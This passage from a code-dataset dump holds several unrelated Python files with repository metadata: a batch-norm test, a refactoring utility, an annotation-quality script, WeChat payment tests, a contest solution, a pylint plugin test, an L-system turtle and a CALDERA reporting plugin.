] | 45 | 2018-04-10T04:26:37.000Z | 2021-09-05T05:16:02.000Z | tests/test_numeric_batchnorm_v2.py | DTennant/Synchronized-BatchNorm-PyTorch | 8cba183f50b630b1c8baa33ddb2fafac61219acd | [
"MIT"
] | 182 | 2018-02-11T10:17:46.000Z | 2022-03-26T23:31:13.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : test_numeric_batchnorm_v2.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 11/01/2018
#
# Distributed under terms of the MIT license.
"""
Test the numerical implementation of batch normalization.
Author: acgtyrant.
See also: https://github.com/vacancy/Synchronized-BatchNorm-PyTorch/issues/14
"""
import unittest
import torch
import torch.nn as nn
import torch.optim as optim
from sync_batchnorm.unittest import TorchTestCase
from sync_batchnorm.batchnorm_reimpl import BatchNorm2dReimpl
class NumericTestCasev2(TorchTestCase):
def testNumericBatchNorm(self):
CHANNELS = 16
batchnorm1 = nn.BatchNorm2d(CHANNELS, momentum=1)
optimizer1 = optim.SGD(batchnorm1.parameters(), lr=0.01)
batchnorm2 = BatchNorm2dReimpl(CHANNELS, momentum=1)
batchnorm2.weight.data.copy_(batchnorm1.weight.data)
batchnorm2.bias.data.copy_(batchnorm1.bias.data)
optimizer2 = optim.SGD(batchnorm2.parameters(), lr=0.01)
for _ in range(100):
input_ = torch.rand(16, CHANNELS, 16, 16)
input1 = input_.clone().requires_grad_(True)
output1 = batchnorm1(input1)
output1.sum().backward()
optimizer1.step()
input2 = input_.clone().requires_grad_(True)
output2 = batchnorm2(input2)
output2.sum().backward()
optimizer2.step()
self.assertTensorClose(input1, input2)
self.assertTensorClose(output1, output2)
self.assertTensorClose(input1.grad, input2.grad)
self.assertTensorClose(batchnorm1.weight.grad, batchnorm2.weight.grad)
self.assertTensorClose(batchnorm1.bias.grad, batchnorm2.bias.grad)
self.assertTensorClose(batchnorm1.running_mean, batchnorm2.running_mean)
self.assertTensorClose(batchnorm2.running_mean, batchnorm2.running_mean)
if __name__ == '__main__':
unittest.main()
| 31.365079 | 80 | 0.697368 | 217 | 1,976 | 6.221198 | 0.465438 | 0.108889 | 0.055556 | 0.077778 | 0.085926 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045512 | 0.199393 | 1,976 | 62 | 81 | 31.870968 | 0.807838 | 0.178644 | 0 | 0 | 0 | 0 | 0.004978 | 0 | 0 | 0 | 0 | 0 | 0.205882 | 1 | 0.029412 | false | 0 | 0.176471 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e473bcf98d67cb78caa5464367510273160301b | 1,245 | py | Python | tools/platform-tools/systrace/catapult/common/py_utils/py_utils/refactor/annotated_symbol/base_symbol.py | rutherlesdev/android-spyware | ddcf6b73f48d78cbb201e749c1e5941f8efd90e6 | [
"MIT"
] | 138 | 2020-12-09T07:08:43.000Z | 2022-03-30T22:32:09.000Z | tools/platform-tools/systrace/catapult/common/py_utils/py_utils/refactor/annotated_symbol/base_symbol.py | rutherlesdev/android-spyware | ddcf6b73f48d78cbb201e749c1e5941f8efd90e6 | [
"MIT"
] | 20 | 2020-04-08T13:50:39.000Z | 2022-03-31T01:01:54.000Z | tools/platform-tools/systrace/catapult/common/py_utils/py_utils/refactor/annotated_symbol/base_symbol.py | rutherlesdev/android-spyware | ddcf6b73f48d78cbb201e749c1e5941f8efd90e6 | [
"MIT"
] | 43 | 2020-12-11T09:43:14.000Z | 2022-03-08T12:56:30.000Z | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from py_utils.refactor import snippet
from six.moves import range # pylint: disable=redefined-builtin
class AnnotatedSymbol(snippet.Symbol):
def __init__(self, symbol_type, children):
super(AnnotatedSymbol, self).__init__(symbol_type, children)
self._modified = False
@property
def modified(self):
if self._modified:
return True
return super(AnnotatedSymbol, self).modified
def __setattr__(self, name, value):
if (hasattr(self.__class__, name) and
isinstance(getattr(self.__class__, name), property)):
self._modified = True
return super(AnnotatedSymbol, self).__setattr__(name, value)
def Cut(self, child):
for i in range(len(self._children)):
if self._children[i] == child:
self._modified = True
del self._children[i]
break
else:
raise ValueError('%s is not in %s.' % (child, self))
def Paste(self, child):
self._modified = True
self._children.append(child)
| 30.365854 | 72 | 0.715663 | 163 | 1,245 | 5.159509 | 0.490798 | 0.085612 | 0.057075 | 0.071344 | 0.080856 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003988 | 0.194378 | 1,245 | 40 | 73 | 31.125 | 0.834497 | 0.151807 | 0 | 0.1 | 0 | 0 | 0.015224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.466667 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4902a1c36ea35fcc7670742a835b7d87381ad7 | 6,628 | py | Python | ground_truth_labeling_jobs/video_annotations_quality_assessment/quality_metrics_cli.py | fhirschmann/amazon-sagemaker-examples | bb4a4ed78cd4f3673bd6894f0b92ab08aa7f8f29 | [
"Apache-2.0"
] | 2 | 2021-07-20T18:25:10.000Z | 2022-01-20T00:04:07.000Z | ground_truth_labeling_jobs/video_annotations_quality_assessment/quality_metrics_cli.py | fhirschmann/amazon-sagemaker-examples | bb4a4ed78cd4f3673bd6894f0b92ab08aa7f8f29 | [
"Apache-2.0"
] | 1 | 2021-03-25T18:31:29.000Z | 2021-03-25T18:31:29.000Z | ground_truth_labeling_jobs/video_annotations_quality_assessment/quality_metrics_cli.py | fhirschmann/amazon-sagemaker-examples | bb4a4ed78cd4f3673bd6894f0b92ab08aa7f8f29 | [
"Apache-2.0"
] | 1 | 2021-04-10T01:56:37.000Z | 2021-04-10T01:56:37.000Z | import os
import json
import numpy as np
import argh
import boto3
from argh import arg
from tqdm import tqdm
from scipy.spatial import distance
from plotting_funcs import *
s3 = boto3.client('s3')
def compute_dist(img_embeds, dist_func=distance.euclidean, obj='Vehicle:1'):
dists = []
inds = []
for i in img_embeds:
if (i>0)&(obj in list(img_embeds[i].keys())):
if (obj in list(img_embeds[i-1].keys())):
dist = dist_func(img_embeds[i-1][obj],img_embeds[i][obj]) # distance between frame at t0 and t1
dists.append(dist)
inds.append(i)
return dists, inds
def get_problem_frames(lab_frame, flawed_labels, size_thresh=.25, iou_thresh=.4, embed=False, imgs=None, verbose=False, embed_std=2):
"""
Function for identifying potentially problematic frames using bounding box size, rolling IoU, and optionally embedding comparison.
"""
if embed:
model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=True)
model.eval()
modules=list(model.children())[:-1]
model=nn.Sequential(*modules)
frame_res = {}
for obj in list(np.unique(lab_frame.obj)):
frame_res[obj] = {}
lframe_len = max(lab_frame['frameid'])
ann_subframe = lab_frame[lab_frame.obj==obj]
size_vec = np.zeros(lframe_len+1)
size_vec[ann_subframe['frameid'].values] = ann_subframe['height']*ann_subframe['width']
size_diff = np.array(size_vec[:-1])- np.array(size_vec[1:])
norm_size_diff = size_diff/np.array(size_vec[:-1])
norm_size_diff[np.where(np.isnan(norm_size_diff))[0]] = 0
norm_size_diff[np.where(np.isinf(norm_size_diff))[0]] = 0
frame_res[obj]['size_diff'] = [int(x) for x in size_diff]
frame_res[obj]['norm_size_diff'] = [int(x) for x in norm_size_diff]
try:
problem_frames = [int(x) for x in np.where(np.abs(norm_size_diff)>size_thresh)[0]]
if verbose:
worst_frame = np.argmax(np.abs(norm_size_diff))
print('Worst frame for',obj,'in',frame, 'is: ',worst_frame)
except:
problem_frames = []
frame_res[obj]['size_problem_frames'] = problem_frames
iou_vec = np.ones(len(np.unique(lab_frame.frameid)))
for i in lab_frame[lab_frame.obj==obj].frameid[:-1]:
iou = calc_frame_int_over_union(lab_frame, obj, i)
iou_vec[i] = iou
frame_res[obj]['iou'] = iou_vec.tolist()
inds = [int(x) for x in np.where(iou_vec<iou_thresh)[0]]
frame_res[obj]['iou_problem_frames'] = inds
if embed:
img_crops = {}
img_embeds = {}
for j,img in tqdm(enumerate(imgs)):
img_arr = np.array(img)
img_embeds[j] = {}
img_crops[j] = {}
for i,annot in enumerate(flawed_labels['tracking-annotations'][j]['annotations']):
try:
crop = img_arr[annot['top']:(annot['top']+annot['height']),annot['left']:(annot['left']+annot['width']),:]
new_crop = np.array(Image.fromarray(crop).resize((224,224)))
img_crops[j][annot['object-name']] = new_crop
new_crop = np.reshape(new_crop, (1,224,224,3))
new_crop = np.reshape(new_crop, (1,3,224,224))
torch_arr = torch.tensor(new_crop, dtype=torch.float)
with torch.no_grad():
emb = model(torch_arr)
img_embeds[j][annot['object-name']] = emb.squeeze()
except:
pass
dists = compute_dist(img_embeds, obj=obj)
# look for distances that are 2+ standard deviations greater than the mean distance
prob_frames = np.where(dists>(np.mean(dists)+np.std(dists)*embed_std))[0]
frame_res[obj]['embed_prob_frames'] = prob_frames.tolist()
return frame_res
# for frame in tqdm(frame_dict):
@arg('--bucket', help='s3 bucket to retrieve labels from and save result to', default=None)
@arg('--lab_path', help='s3 key for labels to be analyzed, an example would look like mot_track_job_results/annotations/consolidated-annotation/output/0/SeqLabel.json', default=None)
@arg('--size_thresh', help='Threshold for identifying allowable percentage size change for a given object between frames', default=.25)
@arg('--iou_thresh', help='Threshold for identifying the bounding boxes of objects that fall below this IoU metric between frames', default=.4)
@arg('--embed', help='Perform sequential object bounding box crop embedding comparison. Generates embeddings for the crop of a given object throughout the video and compares them sequentially, requires downloading a model from PyTorch Torchhub', default=False)
@arg('--imgs', help='Path to images to be used for sequential embedding analysis, only required if embed=True', default=None)
@arg('--save_path', help='s3 key to save quality analysis results to', default=None)
def run_quality_check(bucket = None, lab_path = None,
size_thresh=.25, iou_thresh=.4, embed=False, imgs=None, save_path=None):
"""
Main data quality check utility.
Designed for use on a single video basis, please provide a SeqLabel.json file to analyze, this can typically be found in
the s3 output folder for a given Ground Truth Video job under annotations > consolidated-annotation > output
"""
print('downloading labels')
s3.download_file(Bucket=bucket, Key=lab_path, Filename = 'SeqLabel.json')
# os.system(f'aws s3 cp s3://{bucket}/{lab_path} SeqLabel.json')
with open('SeqLabel.json', 'r') as f:
tlabels = json.load(f)
lab_frame_real = create_annot_frame(tlabels['tracking-annotations'])
print('Running analysis...')
frame_res = get_problem_frames(lab_frame_real, tlabels, size_thresh=size_thresh, iou_thresh=iou_thresh, embed=embed)
with open('quality_results.json', 'w') as f:
json.dump(frame_res, f)
print(f'Output saved to s3 path s3://{bucket}/{save_path}')
s3.upload_file(Bucket=bucket, Key=save_path, Filename='quality_results.json')
# os.system(f'aws s3 cp quality_results.json s3://{bucket}/{save_path}')
def main():
parser = argh.ArghParser()
parser.add_commands([run_quality_check])
parser.dispatch()
if __name__ == "__main__":
main()
| 47.007092 | 260 | 0.62764 | 916 | 6,628 | 4.365721 | 0.281659 | 0.026007 | 0.027007 | 0.008002 | 0.152788 | 0.108777 | 0.08077 | 0.033508 | 0.020005 | 0.020005 | 0 | 0.014848 | 0.248039 | 6,628 | 140 | 261 | 47.342857 | 0.78752 | 0.103651 | 0 | 0.057692 | 0 | 0.019231 | 0.208715 | 0.021363 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0.009615 | 0.086538 | 0 | 0.144231 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4a3e9a66a68d2616331c835300d200618cdcd2 | 3,483 | py | Python | tests/test_payment.py | istommao/wechatkit | e46341c29a69805a8e4c425dc620039fb06b1e45 | [
"MIT"
] | 11 | 2016-09-10T02:21:47.000Z | 2017-10-18T14:49:41.000Z | tests/test_payment.py | istommao/wechatkit | e46341c29a69805a8e4c425dc620039fb06b1e45 | [
"MIT"
] | 5 | 2016-09-10T03:47:26.000Z | 2019-10-02T19:07:50.000Z | tests/test_payment.py | istommao/wechatkit | e46341c29a69805a8e4c425dc620039fb06b1e45 | [
"MIT"
] | 1 | 2016-09-10T02:40:29.000Z | 2016-09-10T02:40:29.000Z | """Test wechat payment module."""
from unittest import TestCase
from unittest.mock import patch
from wechatkit.exceptions import WechatKitException
from wechatkit.payment import WechatPay
class WechatPayTest(TestCase):
"""WechatPayTest test case."""
def setUp(self):
"""Init setup."""
self.appid = 'appid'
self.pay = WechatPay(self.appid, 'mch_id', 'key')
self.data = ''
def tearDown(self):
"""Tear down."""
def get_data(self):
"""Create dummy order data."""
self.data = {
'title': 'title',
'order_uid': 'order_uid',
'total': 10,
'notify_url': 'notify_url',
'trade_type': 'JSAPI',
'ip': '127.0.0.1',
'detail': 'test detail',
'time_expire': 'now + 30m',
'time_start': 'now',
'product_id': 1
}
return self.data
@patch('wechatkit.utils.RequestUtil.post_xml')
def test_close_order(self, mock):
"""Test close order."""
mock_data = {
'return_code': 'SUCCESS',
'return_msg': 'OK',
'appid': self.appid
}
mock.return_value = mock_data
dataset = {
'order_uid': '12312321321'
}
result = self.pay.close_order(**dataset)
self.assertEqual(result, mock_data)
@patch('wechatkit.utils.RequestUtil.post_xml')
def test_close_order_failure(self, mock):
"""Test close order."""
mock_data = {
'return_code': 'FAIL',
'return_msg': '签名失败'
}
mock.return_value = mock_data
dataset = {
'order_uid': '12312321321'
}
with self.assertRaises(WechatKitException) as error:
self.pay.close_order(**dataset)
self.assertEqual(error.exception.error_info, '签名失败')
@patch('wechatkit.utils.RequestUtil.post_xml')
def test_create_order(self, mock_data):
"""Test create a wechat order."""
mock_data.return_value = {'name': 'test', 'return_code': 'SUCCESS'}
data = self.get_data()
resp = self.pay.create_order('openid', **data)
self.assertEqual(resp['name'], 'test')
@patch('wechatkit.utils.RequestUtil.post_xml')
def test_create_order_failure(self, mock_data):
"""Test create order failure."""
mock_data.return_value = {
'return_msg': 'test', 'return_code': 'FAILURE'
}
data = self.get_data()
with self.assertRaises(WechatKitException) as error:
self.pay.create_order('openid', **data)
self.assertEqual(error.exception.error_info, 'test')
def test_create_order_check_data(self):
"""Test check create order data."""
data = self.get_data()
data['title'] = ''
with self.assertRaises(WechatKitException) as error:
self.pay.create_order('openid', **data)
self.assertEqual(error.exception.error_info, '订单描述不能为空')
data['title'] = 'title'
with self.assertRaises(WechatKitException) as error:
self.pay.create_order(None, **data)
self.assertEqual(error.exception.error_info, '用户标识不能为空')
data['trade_type'] = self.pay.PAYMENT_NATIVE
data['product_id'] = ''
with self.assertRaises(WechatKitException) as error:
self.pay.create_order(None, **data)
self.assertEqual(error.exception.error_info, '商品ID不能为空')
| 31.098214 | 75 | 0.585989 | 377 | 3,483 | 5.233422 | 0.233422 | 0.044602 | 0.050684 | 0.0963 | 0.550938 | 0.528637 | 0.516979 | 0.480993 | 0.432843 | 0.342625 | 0 | 0.013137 | 0.278783 | 3,483 | 111 | 76 | 31.378378 | 0.772293 | 0.063451 | 0 | 0.3 | 0 | 0 | 0.171909 | 0.044846 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.1 | false | 0 | 0.05 | 0 | 0.175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4a7fc5fcab7bdd5a11e8b8c9410751f69ce97d | 1,555 | py | Python | contests_atcoder/abc175/abc175_d.py | takelifetime/competitive-programming | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | [
"BSD-2-Clause"
] | null | null | null | contests_atcoder/abc175/abc175_d.py | takelifetime/competitive-programming | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | [
"BSD-2-Clause"
] | 1 | 2021-01-02T06:36:51.000Z | 2021-01-02T06:36:51.000Z | contests_atcoder/abc175/abc175_d.py | takelifetime/competitive-programming | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | [
"BSD-2-Clause"
] | null | null | null | from itertools import accumulate,chain,combinations,groupby,permutations,product
from collections import deque,Counter
from bisect import bisect_left,bisect_right
from math import gcd,sqrt,sin,cos,tan,degrees,radians
from fractions import Fraction
from decimal import Decimal
import sys
input = lambda: sys.stdin.readline().rstrip()
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
MOD=10**9+7
INF=float('inf')
n, k = map(int, input().split())
p = list(map(int, input().split()))
c = list(map(int, input().split()))
unvisited = list(range(n))
g = []
while unvisited:
start = unvisited.pop(-1)
g.append({"sC": [c[start]], "len": 0, "loopgain": 0})
now = start
head = start
while True:
now = p[now] - 1
if now == head:
g[-1]["len"] = len(g[-1]["sC"])
g[-1]["loopgain"] = max(0, g[-1]["sC"][-1])
g[-1]["sC"] += [x + g[-1]["sC"][-1] for x in g[-1]["sC"]]
break
else:
g[-1]["sC"].append(g[-1]["sC"][-1] + c[now])
unvisited.remove(now)
ans = -INF
for graph in g:
cycle, k_mod = divmod(k, graph["len"])
for i in range(graph["len"]):
for movedist in range(1, graph["len"] + 1):
if movedist > k:
continue
if movedist > k_mod:
ans = max(ans, graph["sC"][i + movedist] - graph["sC"][i] + (cycle - 1) * graph["loopgain"])
else:
ans = max(ans, graph["sC"][i + movedist] - graph["sC"][i] + cycle * graph["loopgain"])
print(ans) | 26.810345 | 108 | 0.557556 | 222 | 1,555 | 3.887387 | 0.351351 | 0.020857 | 0.032445 | 0.05562 | 0.134415 | 0.088065 | 0.088065 | 0.088065 | 0.088065 | 0.088065 | 0 | 0.023276 | 0.254019 | 1,555 | 58 | 109 | 26.810345 | 0.72069 | 0.036656 | 0 | 0.047619 | 0 | 0 | 0.049432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4ce3937f385a6c6a274b4bf9572ffcab45fa8a | 1,131 | py | Python | aquami3D/meshgrid test.py | JStuckner/Aquami3D | 72dd59f2b62b008b48d3c6c25db76aa0c7607020 | [
"MIT"
] | null | null | null | aquami3D/meshgrid test.py | JStuckner/Aquami3D | 72dd59f2b62b008b48d3c6c25db76aa0c7607020 | [
"MIT"
] | null | null | null | aquami3D/meshgrid test.py | JStuckner/Aquami3D | 72dd59f2b62b008b48d3c6c25db76aa0c7607020 | [
"MIT"
] | null | null | null | import numpy as np
import time
#https://stackoverflow.com/questions/8956832/python-out-of-memory-on-large-csv-file-numpy?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
def iter_loadtxt(filename, delimiter=' ', skiprows=0, skipcols=0, dtype=float):
def iter_func():
with open(filename, 'r') as infile:
for _ in range(skiprows):
next(infile)
for line in infile:
line = line.rstrip().split(delimiter)[skipcols:skipcols+3]
for item in line:
yield dtype(item)
iter_loadtxt.rowlength = len(line)
data = np.fromiter(iter_func(), dtype=dtype)
data = data.reshape((-1, iter_loadtxt.rowlength))
return data
t0 = time.time()
path = r'E:\E_Documents\Research\Computer Vision Collaboration\Erica Lilleodden/indentor dump.pov'
# OVITO takes 17 seconds to load this file
data = iter_loadtxt(path, skiprows=2, skipcols=2)
data = data.astype(int)
data = data - data.min(axis=0)
a = np.zeros(data.max(axis=0)+1, dtype='bool')
a[data[:,0], data[:,1], data[:,2]] = 1
print('Time: ', time.time()-t0) | 40.392857 | 162 | 0.664898 | 165 | 1,131 | 4.466667 | 0.533333 | 0.059701 | 0.032564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026403 | 0.196286 | 1,131 | 28 | 163 | 40.392857 | 0.784378 | 0.178603 | 0 | 0 | 0 | 0 | 0.107759 | 0.034483 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.217391 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4e4c81732ae52aa5f8c6cb2cea24ab58ab47d4 | 1,263 | py | Python | tests/test_plugin.py | winmasta/pylint-exception-var-name-plugin | 32d833970bd5352ce8f4d1defff2e5cfdd78dc96 | [
"MIT"
] | null | null | null | tests/test_plugin.py | winmasta/pylint-exception-var-name-plugin | 32d833970bd5352ce8f4d1defff2e5cfdd78dc96 | [
"MIT"
] | null | null | null | tests/test_plugin.py | winmasta/pylint-exception-var-name-plugin | 32d833970bd5352ce8f4d1defff2e5cfdd78dc96 | [
"MIT"
] | null | null | null | import astroid
import pylint.testutils
from pylint_exception_var_name_plugin import checker
class TestUniqueReturnChecker(pylint.testutils.CheckerTestCase):
CHECKER_CLASS = checker.ExceptionVarNameChecker
def test_finds_bad_name(self):
node = astroid.extract_node(
"""
try:
1 / 0
except ZeroDivisionError as exc: #@
pass
"""
)
with self.assertAddsMessages(pylint.testutils.Message(msg_id='bad-exception-var-name', node=node)):
self.checker.visit_excepthandler(node)
def test_not_finds_bad_name(self):
node = astroid.extract_node(
"""
try:
1 / 0
except ZeroDivisionError as e: #@
pass
"""
)
with self.assertNoMessages():
self.checker.visit_excepthandler(node)
def test_finds_no_name(self):
node = astroid.extract_node(
"""
try:
1 / 0
except ZeroDivisionError: #@
pass
"""
)
with self.assertNoMessages():
self.checker.visit_excepthandler(node)
| 26.3125 | 107 | 0.529691 | 110 | 1,263 | 5.881818 | 0.363636 | 0.069552 | 0.055641 | 0.088099 | 0.561051 | 0.561051 | 0.561051 | 0.488408 | 0.488408 | 0.299845 | 0 | 0.007823 | 0.392716 | 1,263 | 47 | 108 | 26.87234 | 0.835724 | 0 | 0 | 0.4 | 0 | 0 | 0.026097 | 0.026097 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.15 | false | 0 | 0.15 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e52b3ff840b6ce7077ecfa1de37a870b3194b6f | 3,525 | py | Python | src/lsys/lturtle.py | robertkist/lsystems_py | 9b0e3bb4530c9a3919da2c77b5da548fb50294d6 | [
"MIT"
] | null | null | null | src/lsys/lturtle.py | robertkist/lsystems_py | 9b0e3bb4530c9a3919da2c77b5da548fb50294d6 | [
"MIT"
] | null | null | null | src/lsys/lturtle.py | robertkist/lsystems_py | 9b0e3bb4530c9a3919da2c77b5da548fb50294d6 | [
"MIT"
] | null | null | null | import math
from typing import Union, Any
class LTurtle:
"""A class to implement a simple Logo-style turtle for drawing l-systems"""
def __init__(self,
px: Union[int, float],
py: Union[int, float],
rx: Union[int, float],
ry: Union[int, float],
angle: Union[int, float],
distance: int,
draw_func: Any) -> None:
"""
Constructor.
:param px: start x position on the screen in pixels.
:param py: start y position on the screen in pixels.
:param rx: initial orientation vector x component (use 0, 1, -1)
:param ry: initial orientation vector x component (use 0, 1, -1)
:param angle: turn angle for + and - commands .
:param distance: distance in pixels for F command.
:param draw_func: called when a line should be drawn. Callback param1: line start x, param2: line start y, param3: line end x, param4: line end y
"""
self.__px: Union[int, float] = px # position
self.__py: Union[int, float] = py
self.__rx: Union[int, float] = rx # direction vector
self.__ry: Union[int, float] = ry
self.__angle: Union[int, float] = angle
self.__set_angle(self.__angle)
self.__distance: Union[int, float] = distance
self.__draw_func: Any = draw_func
@property
def px(self) -> Union[int, float]:
"""Returns turtle's x position"""
return self.__px
@property
def py(self) -> Union[int, float]:
"""Returns turtle's x position"""
return self.__py
@property
def rx(self) -> Union[int, float]:
"""Returns tutle's orientation vector's x component"""
return self.__rx
@property
def ry(self) -> Union[int, float]:
"""Returns tutle's orientation vector's y component"""
return self.__ry
def forward(self) -> None:
"""Moves the turtle forward and draws a line"""
ox: Union[int, float] = self.__px
oy: Union[int, float] = self.__py
self.__px += self.__rx * self.__distance
self.__py += self.__ry * self.__distance
self.__draw_func(ox, oy, self.__px, self.__py)
def left(self) -> None:
"""Rotates the turtle counter-clockwise"""
self.__rotate_func(self.__angle)
def right(self) -> None:
"""Rotates the turtle clockwise"""
self.__rotate_func(-self.__angle)
def __set_angle(self, a: float) -> None:
"""Sets the turtle's rotational angle"""
self.__angle = a
if self.__angle == 90:
self.__rotate_func = self.__rotate_90
else:
self.__rotate_func = self.__rotate_any
def __rotate_any(self, a: float) -> None:
"""Rotates the turtle in any direction by any degrees"""
a = math.radians(a)
sin_a = math.sin(a)
cos_a = math.cos(a)
xn = self.__rx * cos_a - self.__ry * sin_a
yn = self.__rx * sin_a + self.__ry * cos_a
self.__rx = xn
self.__ry = yn
def __rotate_90(self, a: float) -> None:
"""
Rotates the turtle in any direction by 90 degrees.
This method is much faster as we're just swapping vector components around.
"""
if a < 0:
dx = self.__ry
self.__ry = -self.__rx
self.__rx = dx
else:
dx = -self.__ry
self.__ry = self.__rx
self.__rx = dx
| 34.558824 | 153 | 0.571348 | 464 | 3,525 | 4.06681 | 0.239224 | 0.072072 | 0.117117 | 0.036036 | 0.372019 | 0.301007 | 0.301007 | 0.229995 | 0.229995 | 0.229995 | 0 | 0.00793 | 0.320284 | 3,525 | 101 | 154 | 34.90099 | 0.779633 | 0.302128 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171875 | false | 0 | 0.03125 | 0 | 0.28125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e54c26a3ddededff2248c316135a3f13e08115f | 2,334 | py | Python | plugins/reporter/app/reporter_svc.py | IGchra/caldera | 75f5a9c3f63139f8f3c6ee6e7cb4ce094e82b1b9 | [
"Apache-2.0"
] | null | null | null | plugins/reporter/app/reporter_svc.py | IGchra/caldera | 75f5a9c3f63139f8f3c6ee6e7cb4ce094e82b1b9 | [
"Apache-2.0"
] | null | null | null | plugins/reporter/app/reporter_svc.py | IGchra/caldera | 75f5a9c3f63139f8f3c6ee6e7cb4ce094e82b1b9 | [
"Apache-2.0"
] | null | null | null | import json
import uuid
import os
from socket import getfqdn
from aiohttp import web
from aiohttp_jinja2 import template
from app.service.auth_svc import check_authorization
# import of own modules
from plugins.reporter.app.detectionreport import create_detection
from plugins.reporter.app.CSVreport import create_csv
##########################################
#### ---------- PARAMETERS ---------- ####
##########################################
class ReporterService:
def __init__(self, services, domain=getfqdn().split('.', 1)[1]):
self.services = services
self.auth_svc = self.services.get('auth_svc')
self.data_svc = self.services.get('data_svc')
self.rest_svc = self.services.get('rest_svc')
self.domain = domain
self.path = os.path.dirname(os.path.abspath(__file__)).split('reporter', 1)[0] + 'reporter/'
@template('reporter.html')
async def splash(self, request):
await self.auth_svc.check_permissions(request)
operations = [o.display for o in await self.data_svc.locate('operations')]
reports = []
for filename in os.listdir(self.path + 'detectionreports'):
with open(self.path + 'detectionreports/' + filename) as f:
data = json.load(f)
reports.append({
'id': data['run_id'],
'name': data['settings']['testname'] + ': ' + data['settings']['host'] + '(' + data['settings']['platform'] + ')',
'start': data['start']
})
return dict(operations=sorted(operations, key=lambda o: o['name']), reports=reports)
@check_authorization
async def detectionreport(self, request):
request_body = json.loads(await request.read())
report_answer = await self.rest_svc.display_operation_report({'op_id': request_body['operation_id'], 'agent_output':'1'})
jsonreports = create_detection(report_answer, self.domain, self.path, request_body['tanium'], request_body['cortex'], request_body['qradar'])
return web.json_response(jsonreports)
@check_authorization
async def csvexport(self, request):
request_body = json.loads(await request.read())
csvreport = create_csv(request_body['report_id'], self.path)
return web.Response(body=csvreport.encode())
